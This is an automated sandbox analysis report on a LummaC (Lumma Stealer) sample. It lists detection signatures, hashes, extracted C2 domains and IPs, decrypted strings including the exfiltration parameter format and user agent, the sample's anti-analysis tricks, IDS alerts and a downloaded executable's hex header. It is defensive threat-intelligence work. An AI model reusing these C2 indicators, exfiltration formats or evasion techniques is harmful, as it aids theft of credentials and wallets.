Windows Analysis Report
0zBsv1tnt4.exe

Overview

General Information

Sample name:	0zBsv1tnt4.exe renamed because original name is a hash value
Original sample name:	27e0a573048fadb3dd4b3b2454c8eda5.exe
Analysis ID:	1580958
MD5:	27e0a573048fadb3dd4b3b2454c8eda5
SHA1:	c841c7fd14f4982e37aed56b25c0d748902fa9e2
SHA256:	6d6884e9912854c20c4dea409280402b3e27a0448407ad7f37c3fb642ee60525
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

LummaC encrypted strings found

Machine Learning detection for sample

PE file contains section with special chars

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to detect virtual machines (SLDT)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Entry point lies outside standard sections

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 0zBsv1tnt4.exe

Avira: detected

Found malware configuration

Source: 0zBsv1tnt4.exe.1868.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["prisonyfork.buzz", "appliacnesot.buzz", "screwamusresz.buzz", "inherineau.buzz", "hummskitnj.buzz", "mindhandru.buzz", "rebuildeso.buzz", "cashfuzysao.buzz", "scentniej.buzz"], "Build id": "LOGS11--LiveTraffic"}

Multi AV Scanner detection for submitted file

Source: 0zBsv1tnt4.exe	Virustotal: Detection: 52%			Perma Link
Source: 0zBsv1tnt4.exe	ReversingLabs: Detection: 57%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 0zBsv1tnt4.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: hummskitnj.buzz
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: cashfuzysao.buzz
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: appliacnesot.buzz
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: screwamusresz.buzz
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: inherineau.buzz
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: scentniej.buzz
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: rebuildeso.buzz
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: prisonyfork.buzz
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: mindhandru.buzz
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: LOGS11--LiveTraffic

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

Code function: 0_2_009658D5 CryptUnprotectData,

0_2_009658D5

Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon

Uses 32bit PE files

Source: 0zBsv1tnt4.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49740 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49714 version: TLS 1.2

Source:

Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 0zBsv1tnt4.exe, 00000000.00000002.1877383452.0000000006512000.00000040.00000800.00020000.00000000.sdmp

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00971A10
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx ecx, byte ptr [edx+eax]	0_2_00973B50
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	0_2_00990340
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0097D34A
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov eax, ebx	0_2_00977440
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+09AD4080h]	0_2_00977440
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov edi, dword ptr [esi+30h]	0_2_0095CC7A
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-16h]	0_2_00990D20
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov edx, ebx	0_2_00958600
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov ecx, eax	0_2_00972E6D
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then jmp edx	0_2_00972E6D
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx ecx, byte ptr [edx+eax]	0_2_00972E6D
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-16h]	0_2_00991720
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0097C09E
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov eax, ebx	0_2_0096C8A0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-000000BEh]	0_2_0096C8A0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edx+0Ah]	0_2_0096C8A0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2E3D7ACEh]	0_2_0096C8A0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov ecx, eax	0_2_0096D8AC
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov ecx, eax	0_2_0096D8AC
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov esi, ecx	0_2_009790D0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0097E0DA
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov ecx, eax	0_2_0096D8D8
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov ecx, eax	0_2_0096D8D8
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov edx, ecx	0_2_0096B8F6
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov edx, ecx	0_2_0096B8F6
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0097C0E6
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then push esi	0_2_0095C805
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_00972830
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+04h]	0_2_0098C830
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0097C850
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h	0_2_0098C990
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0097B980
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then jmp edx	0_2_009739B9
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx ecx, byte ptr [edx+eax]	0_2_009739B9
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_009781CC
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_009789E9
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov ecx, eax	0_2_0097D116
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0097C09E
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	0_2_0097B170
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov ecx, eax	0_2_0097D17D
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-16h]	0_2_00991160
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov eax, dword ptr [00996130h]	0_2_00968169
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_0097AAC0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_00986210
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then lea esi, dword ptr [eax+00000270h]	0_2_00958A50
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then cmp dword ptr [ecx+ebx*8], 385488F2h	0_2_0098CA40
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-6E2DD57Fh]	0_2_0096EB80
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_009573D0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_009573D0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_009783D8
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov edx, ecx	0_2_00968B1B
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov ecx, eax	0_2_0096C300
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+0Ah]	0_2_0095AB40
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_00964CA0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_0096747D
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov word ptr [edx], di	0_2_0096747D
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx edx, byte ptr [eax+edi-74D5A7FEh]	0_2_0097C465
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0097C465
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov edi, ecx	0_2_0097A5B6
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx esi, byte ptr [ebp+eax-46h]	0_2_0098EDC1
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh	0_2_0098CDF0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-3ECB279Fh]	0_2_0098CDF0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh	0_2_0098CDF0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 7F7BECC6h	0_2_0098CDF0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0097DDFF
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov edx, ecx	0_2_00976D2E
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_00978528
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then dec edx	0_2_0098FD70
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax+61765397h]	0_2_0096B57D
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov edx, ecx	0_2_00979E80
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-16h]	0_2_009906F0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0097DE07
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then dec edx	0_2_0098FE00
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov dword ptr [esp+20h], eax	0_2_00959780
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then jmp edx	0_2_009737D6
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov ecx, eax	0_2_0097BF13
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov edi, dword ptr [esp+28h]	0_2_00975F1B
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then jmp eax	0_2_00979739
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00966F52
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]	0_2_00977740

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49714 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49705 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49705 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49704 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49704 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49706 -> 104.21.11.101:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: prisonyfork.buzz
Source: Malware configuration extractor	URLs: appliacnesot.buzz
Source: Malware configuration extractor	URLs: screwamusresz.buzz
Source: Malware configuration extractor	URLs: inherineau.buzz
Source: Malware configuration extractor	URLs: hummskitnj.buzz
Source: Malware configuration extractor	URLs: mindhandru.buzz
Source: Malware configuration extractor	URLs: rebuildeso.buzz
Source: Malware configuration extractor	URLs: cashfuzysao.buzz
Source: Malware configuration extractor	URLs: scentniej.buzz

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 26 Dec 2024 13:14:49 GMTContent-Type: application/octet-streamContent-Length: 2868736Last-Modified: Thu, 26 Dec 2024 12:23:49 GMTConnection: keep-aliveETag: "676d4ad5-2bc600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2c 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2c 00 00 04 00 00 05 73 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 40 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 05 00 00 00 60 00 00 00 06 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6a 71 64 6c 69 69 6f 64 00 40 2b 00 00 a0 00 00 00 38 2b 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 73 75 71 75 79 72 68 00 20 00 00 00 e0 2b 00 00 04 00 00 00 a0 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 00 2c 00 00 22 00 00 00 a4 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 185.215.113.16 185.215.113.16
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View	IP Address: 104.21.11.101 104.21.11.101

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49705 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49704 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49708 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49709 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49713 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49714 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.8:49715 -> 185.215.113.16:80

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49740 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
